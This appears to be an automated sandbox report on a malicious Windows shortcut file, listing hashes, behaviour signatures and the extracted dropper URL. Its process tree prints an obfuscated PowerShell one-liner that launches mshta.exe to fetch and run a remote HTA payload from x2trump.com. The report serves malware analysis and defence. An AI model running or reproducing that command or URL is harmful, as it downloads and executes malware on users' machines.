Resubmissions

21-11-2024 10:04

241121-l33m3svrdk 10

13-11-2024 08:57

241113-kwpbfayjb1 10

Analysis

  • max time kernel
    13s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 10:04

General

  • Target

    44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk

  • Size

    2KB

  • MD5

    353943828023a63279b82cd395e0801b

  • SHA1

    621c1087e5bd6b1b7eee1fa018c781644ee8f932

  • SHA256

    44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb

  • SHA512

    6ea2765098d77d119f98f3c8613829b897f6da1c0fa26458a175d07a15b6cb425be3f0d4ada6fe3f24e680eeeec098b1472e66216a802862240a6b8dfa9983af

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://x2trump.com/x1.hta

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\44660a8ee9588624a610e54463d3ffbce1bf235482a1e88dd2d376a5fb74edbb.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $x='Ac/lum.pa2MrhtSTx1s:o'; &(-join($x[(263-249),(-179+179),(921-918)])) */ (-join($x[(263-249),(-179+179),(921-918)])); */ ~# (-join($x[(-897+902),(263-249),(526-514),(451-438),(-179+179)])); foreach($I in @((943-931),(-222+235),(956-943),(950-943),(-315+333),(-828+847),(-151+153),(833-831),(666-650),(197-188),(227-214),(373-362),(705-701),(-449+454),(677-670),(894-888),(-407+408),(1009-989),(-692+697),(-715+717),(-771+787),(-788+805),(591-585),(-895+907),(499-486),(-834+842))){$p+=$x[$I]}; ~# $p;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://x2trump.com/x1.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        PID:2172

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2912-38-0x000007FEF4ACE000-0x000007FEF4ACF000-memory.dmp

    Filesize

    4KB

  • memory/2912-40-0x00000000022D0000-0x00000000022D8000-memory.dmp

    Filesize

    32KB

  • memory/2912-39-0x000000001B2B0000-0x000000001B592000-memory.dmp

    Filesize

    2.9MB

  • memory/2912-44-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2912-43-0x00000000029BB000-0x0000000002A22000-memory.dmp

    Filesize

    412KB

  • memory/2912-42-0x00000000029B4000-0x00000000029B7000-memory.dmp

    Filesize

    12KB

  • memory/2912-41-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB

  • memory/2912-65-0x000007FEF4810000-0x000007FEF51AD000-memory.dmp

    Filesize

    9.6MB